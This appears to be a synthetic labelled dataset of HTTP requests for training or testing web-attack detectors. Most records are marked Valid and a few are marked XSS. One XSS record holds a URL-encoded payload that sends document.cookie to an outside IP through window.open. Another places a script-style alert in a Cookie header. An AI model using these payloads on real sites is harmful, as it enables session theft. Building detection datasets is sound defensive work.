Cookie: o6dor0ese=Eeltngue3ulwnh;MqAsystemk8CI=svnALMwTN;Vd27=y;uetrEiaonr=Swr=o4td<me atx wl;e9srMrr=07
Cookie2: $Version="66"
Date: Sat, 24 Mar 07 13:57:48 GMT
ETag: "SRCGudR8eFtiS4Ao6"
Expect: 7onuerm
From: merdf@ssdhtag.cz
If-Modified-Since: Tue, 27 May 08 14:21:04 UTC
If-Unmodified-Since: Mon, 09 Nov 09 09:07:09 CET
If-Match: "_KGCGIjngOU45m@wrC3"
If-None-Match: *
If-Range: "DDEQbR@j0ciUMPYkF7V"
Max-Forwards: 31
MIME-Version: 6.2
Pragma: islSc=gedZtrt
Proxy-Authorization: Basic cncwbnU6dHRpSGFhd28=
Authorization: Basic ZTFhbHI6c2FoMmlzdA==
Range: 678-706492,70758-,6439-
Referer: /etoc/ShAtossc/Lf86R.jsp
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: 6Headarpo (nZMDSovN)
UA-CPU: 68000
UA-Disp: 8492,4170,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: FTP/1.6 www.lNind.shtml, HTTP/3.7 178.46.45.83
Transfer-Encoding: compress
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 175 55.57.212.248 "yxhnh1o3It" 
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38950
Start - Id: 14349
class: Valid
GET /r9n/SsigtaO2nlMses/aM/etgFohtwjr/54LAU1OabEVnNGy/4HuJQ6HLYMqZ5X9Xs/4-0XWteQC/aY_at8@aqQW@Kt/6neykAihIkaaooea2Ur.msf?oXifdNb=yyxp_i%27ewore+&jtdjpTeavv2tmit=H9ceu%28dhnsman%5B&rrc5i=ieytepcbynullt81 HTTP/1.0
Host: 77.1.132.16
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, gzip;q=0.0, gzip;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 31.95.37.147
Cookie: l9-Zfah=i yont;sa=eird;aseauiusbefthl=m
Cookie2: $Version="48"
Date: Thu, 21 Jul 05 17:19:29 CET
ETag: "ueRPEkOskSd4hNa"
Expect: 100-continue
From: dn4yib@8dee.fr
If-Modified-Since: Tue, 20 Jan 09 16:14:26 GMT
If-Unmodified-Since: Sat, 16 Jul 05 06:13:27 CET
If-Match: "jE7E6-VKvv5CX5KV"
If-None-Match: *
If-Range: *
Max-Forwards: 17
MIME-Version: 0.3
Pragma: 2wnfz=na
Proxy-Authorization: are8Hq iWu7=vneaiwu
Authorization: qiie 0AtSKsit=sk49uT
Range: -8,95-
Referer: /im1odO/1hhsltSt/vdirew/nsod.swf
TE: deflate;q=0.6
Trailer: Authorization
User-Agent: Mozilla/6.7 (Machintosh; U; Mac OS X 1.4; 43-tl; rv:3.2.2) Gecko/75128696
UA-CPU: StrongARM
UA-Disp: 566,1872,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2649x359
Via: 9.8 239.45.171.178
Transfer-Encoding: compress
Upgrade: ere/0.1, 6eI/9.1
Warning: 189 196.13.70.59:228 "tltsnki6ief" "Fri, 30 Apr 10 24:43:17 GMT"
X-Forwarded-For: 86.196.76.2
X-Serial-Number: 202713931770679449
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14349
Start - Id: 21610
class: Valid
GET /hg9h6dehfdnsTmg/xXZ/tskEzgIAiubKnx.css?tzuslozc8yas4s=i3xyKwOz&6i1nGufneaxpEe=fbinoeh+0xwI0de&abmb=hrt3filEca3ssn9&oa8oiyiRnr7rey=40278319&tsbgbitdc=3&hahet=locationln&7c5hhaghUuTc=7rts9teeis5oghe&7lrsti=2&A9Aku_h8ps0=40667519&3Ntu=27&bR=weandt&n5qoa2en5s=8&stsarmitE=140 HTTP/1.1
Host: 20.44.139.126
Connection: hot7
Accept: image/*
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.9, gzip;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 125.106.235.5
Cookie: ymrva1apgse2cIi=eNnmwindow.openo;allehn2wx=ait<sr6Spfnnx;a5lgcLfahj=i3mxoelhsdsdtn=y1e;fr6mMataf8Tib=601818
Cookie2: $Version="904"
Date: Sat, 23 Oct 04 06:42:29 CET
ETag: "Ji8WC_v9dK6Pm0y"
Expect: rcLe
From: tobWrwtn@esCei1hec.st
If-Modified-Since: Wed, 28 Sep 05 23:05:12 UTC
If-Unmodified-Since: Thu, 04 May 06 08:49:50 UTC
If-Match: "c8J8Ifwu0wJgk8_i67P3"
If-None-Match: *
If-Range: Fri, 05 Mar 10 12:57:50 GMT
Max-Forwards: 3622
MIME-Version: 4.3
Pragma: ei4ydsE='liti'
Proxy-Authorization: iene iujpu5o=8e5behlo
Authorization: 0Een nvr4ih=r0al
Range: 395011-,3-,79399-5
Referer: http://www.efsiwnHt.st/yEtetx/6rbe/tea3e/uIeest9g.rar
TE: trailers,gzip,trailers
Trailer: Accept-Encoding
User-Agent: 1cyisnqd8y (rf3ZQ-t)
UA-CPU: x86
UA-Disp: 198,1596,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 592x4496
Via: FTP/9.2 3.215.81.247
Transfer-Encoding: deflate
Upgrade: 4erenr/4.2, dJoBc/5.1, ohere/8.1, 9Ut/5.9
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 12.32.11.193
X-Serial-Number: 0418048557333038
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21610
Start - Id: 47818
class: XSS
GET /eG/lzn/eg8oKrgohhc0a2ej/sbcv/lwayFeb2rYzt0o/eegaRaiatfM/-Tv8E_Tw4r/tZmANQ/ufgotsn2enosRwce0dl/jpRxuvH2access_loggHnWAupdate.bin?htu7rsTr1s7h=%3Cobject+classid++++%3D++++%22+++clsid%3A...+++++%22++codebase+%3D+++%22+javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F55.5.175.57%2Filri.asp%27%2Bdocument.cookie%29%3B%5D++++%22++%3E HTTP/1.0
Host: www.awwoefgp.st
Connection: close
Accept: application/*, application/*;q=0.6, audio/x-wav;q=0.0
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, identity, deflate, identity;q=0.6, compress;q=0.4
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 203.124.10.83
Cookie: jlnHmg=nescma1zrolinkue;L-1RLzMO@Y=>mo;HU0RXG@=twaeNwslhfoe
Cookie2: $Version="370"
Date: Sat, 18 Jul 09 23:47:45 UTC
ETag: W/"OurwtpibD7A0noXC"
Expect: 100-continue
From: aelcese@ohx6uolgc.ch
If-Modified-Since: Mon, 09 Nov 09 19:26:02 CET
If-Unmodified-Since: Sun, 29 Jan 06 08:00:02 CET
If-Match: "vL@n2bM6DSX3K1T"
If-None-Match: "HJvHbk2nRpGxH96nPX"
If-Range: "xax1uOCs1QxCd3aBSqM"
Max-Forwards: 629
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/g5nxxi/tLEiado/9dOtoth5/deavlru/bosadp.aspx
Authorization: Digest username="3moa"
Range: 2820-37,-5180,81-
Referer: /nrtigUQ/npoeOh/eaimtshi/I4ni/hoinesdm.cgi
TE: gzip;q=0.1
Trailer: TE
User-Agent: xgFPEP http://www.IsJn.st
UA-CPU: x86
UA-Disp: 9028,3177,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 907x206
Via: 3.6 www.keAeda.tiff
Transfer-Encoding: identity
Upgrade: aRsepf/2.8
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 7313347
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47818
Start - Id: 6730
class: Valid
POST /e7evnu7mey/eMlJb7fform1Atg/e23u/IKusr2Swexecw.connectuAfqT.shtml? HTTP/1.1
Content-Length: 116
Content-Language: u,n7
Content-Encoding: identity
Content-Location: /u3vms/cy67ki/codt/roticpm/ddtteio.dll
Content-MD5: czFvcmVmYjdldGFpc3AyNg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 May 09 16:27:25 GMT
Last-Modified: Mon, 26 Dec 05 07:00:16 CET
Host: 123.112.19.42:80
Connection: 3pnmsxr
Accept: audio/basic;q=0.2
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 172.156.250.162
Cookie: er4E=20693
Cookie2: $Version="46"
Date: Tue, 21 Jun 05 04:58:01 CET
ETag: W/"@6RfNeUJZDRik6aWQXRl"
Expect: 100-continue
From: uo9blte@Ic9o.com
If-Modified-Since: Wed, 30 Sep 09 09:01:17 UTC
If-Unmodified-Since: Sat, 12 Sep 09 18:46:28 CET
If-Match: *
If-None-Match: "BJPPafFPex@WjO5"
If-Range: Sun, 24 May 09 04:00:56 GMT
Max-Forwards: 7798
MIME-Version: 7.6
Pragma: oome=eifng
Proxy-Authorization: ditntt orh2ym=aefw
Authorization: NTLM cm5lZGdlc29BSXNsaXQ1ZTFybnJuVFJpQnRMZXRyYWU=
Range: 38-1,16854-
Referer: http://ra5jozt.be/auttebmo/tAer/9jhw.js
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.7 (Machintosh; U; Mac OS X 6.3; di-ir; rv:5.6.7) Gecko/22649060
UA-CPU: Sparc
UA-Disp: 053,477,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 133x848
Via: HTTP/3.1 www.nr0e.htm
Transfer-Encoding: identity
Upgrade: zp6/4.2, Ioh/9.1
Warning: 762 www.hneaRc.tiff "02uia6th8ugpn" 
X-Forwarded-For: 6.218.56.206
X-Serial-Number: 0215264637366024
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~

ikrch=tmLneSghb3onsgj&osheknbazn4o=t6no9pIjnsulotpx&nnat=47&DStgtfoo4g=3166395917&DGeacWo=eti9Stw2h&dgw0=ljLKwNY-Otf

End - Id: 6730
Start - Id: 5647
class: Valid
PUT /IuvmetaDdTu-/rJ.msf? HTTP/1.0
Content-Length: 64
Content-Language: 5w,k,6sen
Content-Encoding: gzip
Content-Location: /teieeeGp/eutyeir/Qoshe.js
Content-MD5: aWUxb1RkcmVubHJ0YWRodQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Jan 07 18:12:49 CET
Last-Modified: Tue, 15 Jul 08 02:08:46 CET
Host: 123.255.87.144
Connection: keep-alive
Accept: application/x-tar;q=0.0, video/mpeg;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: iwf5e-lp, acnfrR-9heji;q=0.7, orsArOai-dp;q=0.6
Cache-Control: no-store
Client-ip: 68.19.194.114
Cookie: OdxqF=LOtak;peeT=93193;e4mH1oEtwrgctAp=482495;yj=rdapuj;seos=9uaggssa
Cookie2: $Version="25"
Date: Sun, 25 Jul 04 20:58:10 CET
ETag: "2DzAokgJd4wxLyG"
Expect: 100-continue
From: noeLofs5@rseiiaono.biz
If-Modified-Since: Sun, 22 Nov 09 15:39:36 GMT
If-Unmodified-Since: Sun, 01 Jul 07 16:54:25 UTC
If-Match: "YHIh5JkkqZR.SLdV_"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM YTNiNG85bHJpc2VlZ0FtMDlBcnNsbld6dW9sZXRobmg5bA==
Authorization: Basic dGtyZHlkOjlmcGxz
Range: 54-,73-799
Referer: http://2oew.uk/ejia/foanpts/criy/dPhe.pdf
TE: trailers,gzip
Trailer: Accept-Charset
User-Agent: gyHtnseirt (oiN599; 7hT_O7; esQobLu6)
UA-CPU: x86
UA-Disp: 1912,4963,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 129x5543
Via: HTTP/8.7 180.128.141.218, 1.3 107.196.15.32
Transfer-Encoding: mxarTs
Upgrade: han/8.7, 10s/1.0, cttH8e/9.6, tmdb/9.7, qlteR/5.3
Warning: 112 www.8ibtez.htm "dsghaEsss5Smu0Ixqn" "Thu, 19 Feb 04 21:53:20 CET"
X-Forwarded-For: 43.162.121.32
X-Serial-Number: 59672
----: -----------------------
~~~~~: ~~~~~~~~~~~

soyehwce8=0188&tek9n=yemsbetneksheb&aarxeL6Jcfngg8=l~?orsapl

End - Id: 5647
Start - Id: 23030
class: Valid
GET /nyyiLb5/pAoGMPC.jsp?C5CT-passthru=qh8itorhs&olgp6lvhoacc=gra&YXRjLI=44&b4mailpbSTconnect06=taCa%26zia3Agt+ey+r2%3D&KrgauKhmM0Sinclude=eA1kTsUipV&ueL9Wlr=7145233351&6u=fik&7lne=1075970&tlE0m=mbaa&RgE=ju%3Bn&nvfiy7=hieah%2Bi HTTP/1.1
Host: 100.222.2.250:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: til-ined7;q=0.9, areo-Lec, brrsmx2-sn;q=0.1
Cache-Control: max-stale
Client-ip: 88.137.15.88
Cookie: eLWsttjqiy8t8tv=e;uafl=tta5Oeqctare;boen=slt~m
Cookie2: $Version="13"
Date: Mon, 31 Jul 06 05:48:01 GMT
ETag: "sTXxFaX4D0VIvUVqjzt"
Expect: Atan
From: h6aMxoya@olmintlal.cz
If-Modified-Since: Sun, 21 Mar 10 15:32:18 GMT
If-Unmodified-Since: Mon, 20 Nov 06 07:39:37 UTC
If-Match: "Wg8n4Lly_D6M1uPB5d"
If-None-Match: "akWT9vI1iwPRcw-W1"
If-Range: Wed, 22 Aug 07 04:23:27 UTC
Max-Forwards: 23
MIME-Version: 2.9
Pragma: tu=lnttRYd9
Proxy-Authorization: Basic aHN4ZWNubGM6aHplcnBlTHI=
Authorization: 9nuEki 3ate=dcovnp
Range: -41
Referer: /ltanao7i/hns2rhi/es1et1ms/n7me/l6Or3.gif
TE: trailers,trailers
Trailer: Warning
User-Agent: tetdpnasroR0enoHaura
UA-CPU: x86
UA-Disp: 8779,521,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6076x9120
Via: 6.4 162.55.244.91, 0.5 www.rxxn3.tiff
Transfer-Encoding: gzip
Upgrade: Tpmp/2.0
Warning: 738 www.grsFeoxo.png "itas" 
X-Forwarded-For: 253.18.58.174
X-Serial-Number: 794051
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23030
Start - Id: 2719
class: Valid
GET /sMS99./piijrntbure/ppasswd@CeIeuGQFT%uZ/uHaj/rgiihjilmi/esdEE/ai2XsE4G.sm/2t.q/0R.aJQ/lorelw.tiff?aAx17n4=datagw+c&stjMh6dq=7049&ieetqex=ed3d&aeweee4frsi=79665&GVxA=1411&olua=682280&hte=nvg0wk+Rt HTTP/1.0
Host: 2.144.250.13
Connection: close
Accept: image/gif;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: identity, compress;q=0.0, deflate, compress;q=0.1
Accept-Language: hra-s;q=0.8, s7ib-aace, 7hyonu-Gmirbtmt;q=0.3
Cache-Control: no-transform
Client-ip: 118.196.176.82
Cookie: gaatutEni=8694;sgr1ropeg=tnh;c2nn29mvnc=oywgetinxem/;]re'T?be0
Cookie2: $Version="995"
Date: Wed, 06 Feb 08 23:44:10 UTC
ETag: W/"tl03X75yzzkyhRscYHqO"
Expect: 100-continue
From: elaee@z3vnA8l.ch
If-Modified-Since: Fri, 18 Apr 08 15:20:32 UTC
If-Unmodified-Since: Tue, 12 Aug 08 03:33:59 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 21 Jul 06 11:12:10 GMT
Max-Forwards: 5
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: hnknte 6dhe=ailltedl
Authorization: Digest opaque="vctre"
Range: 800-526712,0803-
Referer: /tSrnv.exe
TE: gzip;q=0.8,trailers,deflate;q=0.2
Trailer: Expect
User-Agent: eknRzTh1 http://www.hOtObgE.be
UA-CPU: 68000
UA-Disp: 991,432,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9002x158
Via: 7.0 www.oFamt.shtml:7, 8.6 94.71.115.185
Transfer-Encoding: compress
Upgrade: ztd/6.6, uveUC/2.7, edns/8.2, 7mo/6.6
Warning: 722 219.161.37.147 "eueen5o9vYS" "Tue, 30 Aug 05 03:30:07 CET"
X-Forwarded-For: 185.239.118.59
X-Serial-Number: 053261538285243
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2719
Start - Id: 10078
class: Valid
GET /n_uUqQ@btzeuqKo/Soehtmaetij9S/reDeo7et2nesn/o-m/PhchildB.exe?a2in=aHSfD&kerHDyat=maccess_logy+N&Ittntuarire=+EtdaeuuewPE&uzL3e=96&pFL7pZ=dlet3&ate=r&Clah22oiln=iss HTTP/1.1
Host: www.bwqese.cz
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp, big5
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: min-fresh=79
Client-ip: 8.204.80.232
Cookie: ivhGuli=ej0Udupm6;leerySlanf=oetYoaJlan;zhesa6rarttan=h;ohmtd=164;mhzl3sj=rdtVZmaw-2
Cookie2: $Version="231"
Date: Sat, 06 Feb 10 13:08:50 GMT
ETag: W/"Tw9hk2SDw2rnBAKa2m"
Expect: nEndi
From: aemYeste@u736nnw.biz
If-Modified-Since: Fri, 08 Sep 06 13:19:55 GMT
If-Unmodified-Since: Sat, 26 Mar 05 09:32:32 GMT
If-Match: *
If-None-Match: "3vLXk2kCGt@sp7QM27sN"
If-Range: "keP9uvYISOomEjpR"
Max-Forwards: 5
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic d2lia25yczpzNnR0
Authorization: Basic bHROb3RpcTpSbmhlZXRl
Range: 1978-3,68-
Referer: /bsah/eeejd/wtM4x.tiff
TE: chunked,trailers,gzip
Trailer: Connection
User-Agent: Mozilla/4.6 (Machintosh; U; Mac OS X 6.6; hc-0o; rv:5.4.6) Gecko/61958641
UA-CPU: 68000
UA-Disp: 886,964,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6453x8240
Via: jwSmb9/1.8 164.72.31.69:195
Transfer-Encoding: deflate
Upgrade: eu2s/8.6, Vrm/4.7, osrS/6.7
Warning: 775 160.139.89.107 "jar0wts" 
X-Forwarded-For: 219.87.157.60
X-Serial-Number: 78634326822916597
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10078
Start - Id: 21833
class: Valid
GET /OBohaving2iP2jch@I/ynllIrg/eFMVY2fDqK_njhUOeD@5/aohntiInoisir/fhoeFaowimoion2u/6KKQhSGh/td7ifSutoehifB4/wpnjKXlryZb/hG__qDH7D1/zPRHcaeb-lgC/etszlm.cgi?te=s+c+documentn HTTP/1.0
Host: 80.245.31.196
Connection: keep-alive
Accept: audio/*, audio/*, video/*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.4
Accept-Language: igPa-ebplN;q=0.2
Cache-Control: no-cache
Client-ip: 254.135.226.163
Cookie: 6Qfx8Z=9TGFHK68u;podlydisadnsIte=12406148;fnoiaa3tmo=6snactE;Myy0bs1ea80=itinclude4;rnYsetsqre=winntd(&yuinputec|w2
Cookie2: $Version="3"
Date: Sun, 21 Jun 09 01:11:33 CET
ETag: W/"R5lCvqAM8NjhhWf0sjS"
Expect: ulwbiexh=aweHnnaE;siieeo
From: aiahtri8@rnlaavmnt.be
If-Modified-Since: Thu, 22 Apr 04 03:57:12 UTC
If-Unmodified-Since: Sun, 08 Feb 09 09:29:42 CET
If-Match: "9.x.zOyv4BqmBtpNK"
If-None-Match: "w5QSQl@ENc3AFzTQ"
If-Range: Thu, 25 Jun 09 10:10:30 GMT
Max-Forwards: 8404
MIME-Version: 0.1
Pragma: eoirwoi=onr
Proxy-Authorization: Digest nonce
Authorization: Basic eXR1czBlczpvcm5vb2E=
Range: 65-,335-
Referer: http://neilah.uk/mPdw/v4oio.cfm
TE: trailers,gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: efoTcneac2/0.4.0.9.8
UA-CPU: x86
UA-Disp: 488,0035,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3901x4660
Via: HTTP/3.8 www.scluqo.jpeg
Transfer-Encoding: deflate
Upgrade: odPV/9.4, lhi/7.8, ads/8.6, gll3/8.2
Warning: 721 www.daoejbee.jpg:03056 "gyndpceaorfoaes" "Thu, 02 Jul 09 06:04:20 UTC"
X-Forwarded-For: 113.55.233.173
X-Serial-Number: 328079
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21833
Start - Id: 32059
class: Valid
GET /rXyToSeOIDNf/tisoreqt/hyfDiBtKiBNbc21F8I@/pnmaqMoplnhhy/mrb5iitnrd.mdb?hRae1uE=31&8i=jRVMwwsQuQ&HZMEqXpasswdbeUYq=u%7C+%3D&aoiaosoob=151720&9s=uLvkuR&6tsdire=1&uasqonexgse=%7Ea&ah7IQr=Nnet-k%40o%29dnao%3A+q&hkiHacn=ppU7ZDP5D&10F4BO=etNr6 HTTP/1.0
Host: www.imiLbtjn.ch
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.6, deflate;q=0.6
Accept-Language: A2et-i9
Cache-Control: no-store
Client-ip: 83.23.198.140
Cookie: ee=3rn7uL;stdin%uDmm1BCt0autoexech=564223
Cookie2: $Version="7"
Date: Sat, 13 Jan 07 10:33:10 GMT
ETag: W/"qAkeEvge-usYZ38PeGQ8"
Expect: 100-continue
From: hGao@Hawa.uk
If-Modified-Since: Thu, 30 Jun 05 24:29:55 UTC
If-Unmodified-Since: Wed, 10 Jun 09 16:53:07 GMT
If-Match: "H2yvcz8RPHX.d1gK"
If-None-Match: "pLZIK3cUxESo3gtiG5"
If-Range: Sat, 28 Feb 09 01:02:40 UTC
Max-Forwards: 3085
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM cDFtY2ljY3JuaWRmZkFzcHRkaWNwb3NpZmVhZTBycmhtc25BcjJxZXF0ZXA=
Authorization: aSLf0 ryrrt=snrzIdtr
Range: 81-,-8,-69673
Referer: http://www.hEwsl.it/fohqc/eelre.css
TE: chunked;q=0.5,gzip
Trailer: Authorization
User-Agent: Mozilla/9.8 (X11; U; Linux i586 3.1; wt-ar; rv:7.6.2) Gecko/10579147
UA-CPU: MIPS
UA-Disp: 342,5429,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8495x114
Via: 0.4 www.arNda.js, 3.9 150.69.78.19, FTP/3.4 www.sesauu.tiff
Transfer-Encoding: compress
Upgrade: oerjV/8.7, A2Anb8/4.9, Stt0/8.5, oPr/9.4
Warning: 167 94.137.101.249 "sidalepniti" "Sat, 29 Oct 05 02:08:38 GMT"
X-Forwarded-For: 211.198.61.151
X-Serial-Number: 16576925520335
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32059
Start - Id: 29606
class: Valid
GET /A9TttmBqVYCXa/errrefowsjegagoLi/t.CBRhw/2niklaoh/eGoiacelAllgo/fLvgNpVhIB6p8U/iXUHp_.html?aai8fqsE9xghgtR=eNBsGz&r2mrdhaas9ti=nMaqoqu.&elw9s83ij0zxnOu=6568886265&vrnhnb9g=714760960&noKm=gQaI8D&uet9iupeqO=goOJnJutr4pA&vGe3e3hsNN3p=%7Copenan&stevY5Yp=S+h+lakn%7C9&sUaf=onu4l+e-mt%25dfz%5C&s1ln=ni&hd1ws56iclc=rw-&dset969Tcdh9ss2=itusimt&w1saehqterltnee=autoexectynthrjtnulln%5C&rwiapith=djbl2sorsne&vei6rsse=acany HTTP/1.1
Host: www.tczohssAee.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: eVi-suaacsac, 8yLuiv-wker0, lm-6, ts2nre-pnnwoels, d-am6oeni8;q=0.8
Cache-Control: only-if-cached
Client-ip: 140.155.217.246
Cookie: fylnrhe=l admin|8
Cookie2: $Version="8"
Date: Mon, 17 May 04 02:30:48 UTC
ETag: W/"9hHlpMB_S.slcfp4W"
Expect: 100-continue
From: hk595Mi@tgQyreiAr.cz
If-Modified-Since: Sat, 12 Jan 08 11:16:50 CET
If-Unmodified-Since: Tue, 27 Oct 09 19:09:51 UTC
If-Match: "-98-asdq1ZGe3SV_OoA"
If-None-Match: "PpYXrdpeBoYU8BE"
If-Range: "VuX7P2uzM1RNHHC"
Max-Forwards: 8852
MIME-Version: 1.3
Pragma: ns='2a6vo'
Proxy-Authorization: Basic ZWVzaHRnb2U6T2hvY2dKcw==
Authorization: e6soxu e9oa=tliyRiei
Range: -074,-900485
Referer: http://4hHaitpm.cz/egs9rt/va6Evtph/yeeeifs/iaasews.mspx
TE: deflate;q=0.9,trailers
Trailer: Date
User-Agent: Ib7iead (oe4Eom)
UA-CPU: StrongARM
UA-Disp: 872,513,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3909x9569
Via: rirsdh/4.7 www.feaQ5l.js
Transfer-Encoding: compress
Upgrade: htrurs/2.1
Warning: 552 www.eghciu.html "MEdi" "Thu, 09 Jun 05 12:22:53 GMT"
X-Forwarded-For: 41.83.226.161
X-Serial-Number: 41855
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29606
Start - Id: 7866
class: Valid
PUT /gLocITtO.x@1l2T3Pw/xv/ed5cweo.aspx? HTTP/1.0
Content-Length: 184
Content-Language: eonlIK,tWReoun,y
Content-Encoding: gzip
Content-Location: http://swfhs.biz/nrTk.ace
Content-MD5: b2hkeHJjYTdQdHJ0cHE4bg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Jan 04 13:52:15 UTC
Last-Modified: Tue, 28 Jul 09 15:50:49 GMT
Host: 62.144.53.176:80
Connection: close
Accept: audio/*;q=0.5, video/mpeg;q=0.4, text/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: kahad-Tzh
Cache-Control: no-cache
Client-ip: 210.135.187.234
Cookie: nssaaostdd04Eeh=4 gmeu5f gwethstdinhin;LlRU=sxBhQCb3;oWMnq6=019413;pEeegvnusdfs=d/'deeb;ernhaco=ie
Cookie2: $Version="69"
Date: Tue, 20 Jan 09 13:49:00 CET
ETag: W/"EYBiW_KTocMDsKLw.3"
Expect: 100-continue
From: Oosa@iedncd.ch
If-Modified-Since: Thu, 25 Jun 09 08:04:11 UTC
If-Unmodified-Since: Wed, 14 Feb 07 11:09:02 GMT
If-Match: *
If-None-Match: *
If-Range: "zOKYW9Z3uJBRr2fCjN"
Max-Forwards: 402
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic bkFoZmFlbmg6czBzaWVhRTA=
Authorization: Basic c2VrYkE6YXRldA==
Range: 3-90,72191-
Referer: http://www.adplmu.net/2oefedd/etgp.jsp
TE: deflate,trailers,trailers
Trailer: TE
User-Agent: h2bfFheTDLshbooeo
UA-CPU: Sparc
UA-Disp: 754,966,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 490x7178
Via: HTTP/1.8 84.40.153.33, 1.6 28.241.222.176, 9.0 www.ckoz7rrs.png
Transfer-Encoding: hmn7l
Upgrade: fsReNh/3.7, m50/6.2, romhEe/2.5, eu5/3.3
Warning: 457 58.248.149.253 "ghot6raooeReo" 
X-Forwarded-For: 205.233.18.56
X-Serial-Number: 625088294062
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aoy=528&Qfd0r=OeU&LBJkMMopt7U=awktn9hnodaSe&ywinntgq3styleZBiaA9=2heSY&e9heh=(esEixgreUm3&EiTH1uactobty=6iacsoeur&catg1ncuh1e=echoataHeng:inlareplaceugnsxx&ndApcn8o=tNo8@mTga2n8T

End - Id: 7866
Start - Id: 48286
class: XSS
PUT /ejnuhcsgatoqtdrsrhwi/f2zN8ya4W5o/titItaml/LOroehigr/se/1n/iTotnowdnsupm/tafSi.jsp? HTTP/1.0
Content-Length: 206
Content-Language: eskfuw
Content-Encoding: gzip
Content-Location: http://7set.biz/enieis/3esnessd/eObhre/ohgp/nr7Ui.asp
Content-MD5: ZGhkcm53YTltOGlpZWVjbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 18 Sep 08 08:12:43 CET
Last-Modified: Sat, 22 May 04 09:44:14 CET
Host: 0.227.76.97
Connection: iMEAy
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=8978
Client-ip: 145.84.197.68
Cookie: ae=1264525597;ei=<style   type  =  "  text/javascript  ">[alert   ('rwmiE');]</style  >
Cookie2: $Version="1"
Date: Sat, 03 Nov 07 16:51:31 UTC
ETag: W/"@AK-G5wc-82.2bQE"
If-Modified-Since: Wed, 12 Oct 05 19:13:24 GMT
If-Unmodified-Since: Fri, 19 Sep 08 22:43:31 UTC
If-Match: *
If-None-Match: *
If-Range: "0VL_V5gvupVFO1KI8TB"
Max-Forwards: 9066
MIME-Version: 3.3
Authorization: ndLoy oHanesEu=Anil
Referer: http://www.ecca0g.com/Mroann/hIvt/lhoo.js
